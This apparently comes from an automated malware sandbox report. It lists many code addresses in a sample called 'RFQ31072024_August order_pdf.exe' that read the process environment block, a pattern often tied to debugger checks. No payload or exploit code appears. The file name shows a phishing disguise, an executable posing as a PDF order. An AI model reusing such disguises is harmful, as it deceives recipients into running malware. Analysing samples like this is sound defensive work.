Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D83C0 mov eax, dword ptr fs:[00000030h]	7_2_015D83C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016063FF mov eax, dword ptr fs:[00000030h]	7_2_016063FF
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0168C3CD mov eax, dword ptr fs:[00000030h]	7_2_0168C3CD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016563C0 mov eax, dword ptr fs:[00000030h]	7_2_016563C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE3F0 mov eax, dword ptr fs:[00000030h]	7_2_015EE3F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE3F0 mov eax, dword ptr fs:[00000030h]	7_2_015EE3F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE3F0 mov eax, dword ptr fs:[00000030h]	7_2_015EE3F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016743D4 mov eax, dword ptr fs:[00000030h]	7_2_016743D4
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016743D4 mov eax, dword ptr fs:[00000030h]	7_2_016743D4
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E03E9 mov eax, dword ptr fs:[00000030h]	7_2_015E03E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E3DB mov eax, dword ptr fs:[00000030h]	7_2_0167E3DB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E3DB mov eax, dword ptr fs:[00000030h]	7_2_0167E3DB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E3DB mov ecx, dword ptr fs:[00000030h]	7_2_0167E3DB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E3DB mov eax, dword ptr fs:[00000030h]	7_2_0167E3DB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C8397 mov eax, dword ptr fs:[00000030h]	7_2_015C8397
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C8397 mov eax, dword ptr fs:[00000030h]	7_2_015C8397
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C8397 mov eax, dword ptr fs:[00000030h]	7_2_015C8397
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F438F mov eax, dword ptr fs:[00000030h]	7_2_015F438F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F438F mov eax, dword ptr fs:[00000030h]	7_2_015F438F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CE388 mov eax, dword ptr fs:[00000030h]	7_2_015CE388
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CE388 mov eax, dword ptr fs:[00000030h]	7_2_015CE388
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CE388 mov eax, dword ptr fs:[00000030h]	7_2_015CE388
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6259 mov eax, dword ptr fs:[00000030h]	7_2_015D6259
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CA250 mov eax, dword ptr fs:[00000030h]	7_2_015CA250
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01680274 mov eax, dword ptr fs:[00000030h]	7_2_01680274
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01658243 mov eax, dword ptr fs:[00000030h]	7_2_01658243
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01658243 mov ecx, dword ptr fs:[00000030h]	7_2_01658243
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C826B mov eax, dword ptr fs:[00000030h]	7_2_015C826B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4260 mov eax, dword ptr fs:[00000030h]	7_2_015D4260
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4260 mov eax, dword ptr fs:[00000030h]	7_2_015D4260
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4260 mov eax, dword ptr fs:[00000030h]	7_2_015D4260
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C823B mov eax, dword ptr fs:[00000030h]	7_2_015C823B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	7_2_015DA2C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	7_2_015DA2C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	7_2_015DA2C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	7_2_015DA2C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	7_2_015DA2C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E02E1 mov eax, dword ptr fs:[00000030h]	7_2_015E02E1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E02E1 mov eax, dword ptr fs:[00000030h]	7_2_015E02E1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E02E1 mov eax, dword ptr fs:[00000030h]	7_2_015E02E1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016662A0 mov eax, dword ptr fs:[00000030h]	7_2_016662A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016662A0 mov ecx, dword ptr fs:[00000030h]	7_2_016662A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016662A0 mov eax, dword ptr fs:[00000030h]	7_2_016662A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016662A0 mov eax, dword ptr fs:[00000030h]	7_2_016662A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016662A0 mov eax, dword ptr fs:[00000030h]	7_2_016662A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016662A0 mov eax, dword ptr fs:[00000030h]	7_2_016662A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E284 mov eax, dword ptr fs:[00000030h]	7_2_0160E284
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E284 mov eax, dword ptr fs:[00000030h]	7_2_0160E284
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01650283 mov eax, dword ptr fs:[00000030h]	7_2_01650283
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01650283 mov eax, dword ptr fs:[00000030h]	7_2_01650283
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01650283 mov eax, dword ptr fs:[00000030h]	7_2_01650283
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E02A0 mov eax, dword ptr fs:[00000030h]	7_2_015E02A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E02A0 mov eax, dword ptr fs:[00000030h]	7_2_015E02A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160656A mov eax, dword ptr fs:[00000030h]	7_2_0160656A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160656A mov eax, dword ptr fs:[00000030h]	7_2_0160656A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160656A mov eax, dword ptr fs:[00000030h]	7_2_0160656A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8550 mov eax, dword ptr fs:[00000030h]	7_2_015D8550
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8550 mov eax, dword ptr fs:[00000030h]	7_2_015D8550
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE53E mov eax, dword ptr fs:[00000030h]	7_2_015FE53E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE53E mov eax, dword ptr fs:[00000030h]	7_2_015FE53E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE53E mov eax, dword ptr fs:[00000030h]	7_2_015FE53E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE53E mov eax, dword ptr fs:[00000030h]	7_2_015FE53E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE53E mov eax, dword ptr fs:[00000030h]	7_2_015FE53E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01666500 mov eax, dword ptr fs:[00000030h]	7_2_01666500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4500 mov eax, dword ptr fs:[00000030h]	7_2_016A4500
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535 mov eax, dword ptr fs:[00000030h]	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535 mov eax, dword ptr fs:[00000030h]	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535 mov eax, dword ptr fs:[00000030h]	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535 mov eax, dword ptr fs:[00000030h]	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535 mov eax, dword ptr fs:[00000030h]	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0535 mov eax, dword ptr fs:[00000030h]	7_2_015E0535
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D65D0 mov eax, dword ptr fs:[00000030h]	7_2_015D65D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C5ED mov eax, dword ptr fs:[00000030h]	7_2_0160C5ED
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C5ED mov eax, dword ptr fs:[00000030h]	7_2_0160C5ED
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E5CF mov eax, dword ptr fs:[00000030h]	7_2_0160E5CF
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E5CF mov eax, dword ptr fs:[00000030h]	7_2_0160E5CF
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0160A5D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0160A5D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	7_2_015FE5E7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D25E0 mov eax, dword ptr fs:[00000030h]	7_2_015D25E0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016505A7 mov eax, dword ptr fs:[00000030h]	7_2_016505A7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016505A7 mov eax, dword ptr fs:[00000030h]	7_2_016505A7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016505A7 mov eax, dword ptr fs:[00000030h]	7_2_016505A7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D2582 mov eax, dword ptr fs:[00000030h]	7_2_015D2582
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D2582 mov ecx, dword ptr fs:[00000030h]	7_2_015D2582
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01604588 mov eax, dword ptr fs:[00000030h]	7_2_01604588
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F45B1 mov eax, dword ptr fs:[00000030h]	7_2_015F45B1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F45B1 mov eax, dword ptr fs:[00000030h]	7_2_015F45B1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E59C mov eax, dword ptr fs:[00000030h]	7_2_0160E59C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C645D mov eax, dword ptr fs:[00000030h]	7_2_015C645D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F245A mov eax, dword ptr fs:[00000030h]	7_2_015F245A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165C460 mov ecx, dword ptr fs:[00000030h]	7_2_0165C460
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160E443 mov eax, dword ptr fs:[00000030h]	7_2_0160E443
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FA470 mov eax, dword ptr fs:[00000030h]	7_2_015FA470
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FA470 mov eax, dword ptr fs:[00000030h]	7_2_015FA470
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FA470 mov eax, dword ptr fs:[00000030h]	7_2_015FA470
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656420 mov eax, dword ptr fs:[00000030h]	7_2_01656420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A430 mov eax, dword ptr fs:[00000030h]	7_2_0160A430
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01608402 mov eax, dword ptr fs:[00000030h]	7_2_01608402
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01608402 mov eax, dword ptr fs:[00000030h]	7_2_01608402
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01608402 mov eax, dword ptr fs:[00000030h]	7_2_01608402
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CC427 mov eax, dword ptr fs:[00000030h]	7_2_015CC427
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CE420 mov eax, dword ptr fs:[00000030h]	7_2_015CE420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CE420 mov eax, dword ptr fs:[00000030h]	7_2_015CE420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CE420 mov eax, dword ptr fs:[00000030h]	7_2_015CE420
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D04E5 mov ecx, dword ptr fs:[00000030h]	7_2_015D04E5
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016044B0 mov ecx, dword ptr fs:[00000030h]	7_2_016044B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165A4B0 mov eax, dword ptr fs:[00000030h]	7_2_0165A4B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D64AB mov eax, dword ptr fs:[00000030h]	7_2_015D64AB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0750 mov eax, dword ptr fs:[00000030h]	7_2_015D0750
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160674D mov esi, dword ptr fs:[00000030h]	7_2_0160674D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160674D mov eax, dword ptr fs:[00000030h]	7_2_0160674D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160674D mov eax, dword ptr fs:[00000030h]	7_2_0160674D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8770 mov eax, dword ptr fs:[00000030h]	7_2_015D8770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0770 mov eax, dword ptr fs:[00000030h]	7_2_015E0770
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01654755 mov eax, dword ptr fs:[00000030h]	7_2_01654755
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612750 mov eax, dword ptr fs:[00000030h]	7_2_01612750
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612750 mov eax, dword ptr fs:[00000030h]	7_2_01612750
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165E75D mov eax, dword ptr fs:[00000030h]	7_2_0165E75D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C720 mov eax, dword ptr fs:[00000030h]	7_2_0160C720
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C720 mov eax, dword ptr fs:[00000030h]	7_2_0160C720
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0710 mov eax, dword ptr fs:[00000030h]	7_2_015D0710
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164C730 mov eax, dword ptr fs:[00000030h]	7_2_0164C730
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160273C mov eax, dword ptr fs:[00000030h]	7_2_0160273C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160273C mov ecx, dword ptr fs:[00000030h]	7_2_0160273C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160273C mov eax, dword ptr fs:[00000030h]	7_2_0160273C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C700 mov eax, dword ptr fs:[00000030h]	7_2_0160C700
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01600710 mov eax, dword ptr fs:[00000030h]	7_2_01600710
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165E7E1 mov eax, dword ptr fs:[00000030h]	7_2_0165E7E1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DC7C0 mov eax, dword ptr fs:[00000030h]	7_2_015DC7C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016507C3 mov eax, dword ptr fs:[00000030h]	7_2_016507C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D47FB mov eax, dword ptr fs:[00000030h]	7_2_015D47FB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D47FB mov eax, dword ptr fs:[00000030h]	7_2_015D47FB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F27ED mov eax, dword ptr fs:[00000030h]	7_2_015F27ED
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F27ED mov eax, dword ptr fs:[00000030h]	7_2_015F27ED
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F27ED mov eax, dword ptr fs:[00000030h]	7_2_015F27ED
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016847A0 mov eax, dword ptr fs:[00000030h]	7_2_016847A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167678E mov eax, dword ptr fs:[00000030h]	7_2_0167678E
